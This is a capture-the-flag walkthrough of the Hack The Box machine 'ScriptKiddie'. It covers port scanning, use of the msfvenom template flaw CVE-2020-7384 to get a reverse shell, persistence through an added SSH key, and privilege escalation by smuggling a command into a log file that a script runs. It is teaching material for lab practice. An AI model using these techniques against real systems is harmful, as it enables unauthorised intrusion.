HTB - ScriptKiddie


We will start with NMAP -

nmap -sC -sV -p- -oN full_nmap_tcp -v -Pn

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
| 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|\_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)

5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
| http-methods:
|\_ Supported Methods: HEAD GET POST OPTIONS
|\_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|\_http-title: k1d'5 h4ck3r t00l5



Since SSH is secure service and not much attack surface, we will start with port 5000.

Port 5000

We see Python Web framework - Werkzeug/0.16.1 Python/3.8.5

Looking at the functionality, we can generate Shell, perform NMAP scan and look for exploits via Searchsploit. This looks like "frontend" of the Metasploit framework.

We also see that the web page is accepting template file while generating payloads

Quick google search on MSFVenom and Template, we come across CVE-2020-7384 Reference -

We can inject our own payload and when MSFvenom generates payload, the payload is executed.


Initial Foothold

Exploiting CVE-2020-7384

We will download the exploit code and input attacker ip and port on the prompt -

Install jarsigner if it is not installed -

sudo apt-get install default-jdk

The exploit.apk is generated and we start the netcat listener -

Upload apk to work-

Once uploaded exploit.apk and click generate

Reverse Shell -

Make shell stabilize by inserting our SSH public key in /home/kid/.ssh/authorized_keys

SSH to target as user kidwith SSH key -

Privilege Escalation

Exploiting intended functionality -

We see another user pwn in the system and we can access their home directory. Browsing to the /home/pwn/ we see script.

Looking at the script, we see it is calling /home/kid/logs/hackers which own'd by our current user kid -

Let's dissect the script line by line and see if we can own user pwn --

Looking at permissions, we can read/write /home/kid/logs/hackers. This is the one we can control.

The core of the script is the nmap command which is ran using shell script sh. So if we overwrite that using the $log file we control, we can use bash magic and append our payload.

Also, looking at the "cut" command in the script, it is grabbing text from log file after second white space

So we can stuff our payload as -

echo -n "blah blah ;/home/kid/logs/ #" > hacker
cat $log | cut -d' ' -f3- | sort -u
;/home/kid/logs/ #

Finally, at last line in the script, we see a if condition in the last line that if the line count is more than 0, then the file is overwritten with nothing by script itself.

To overcome this, we can use "echo -n" so there is no "new line" or "line break" inserted.

We get shell as pwn -

Looking at sudo -l output for pwn, we see they can /opt/metasploit-framework-6.0.9/msfconsole as SUDO without password -


Last updated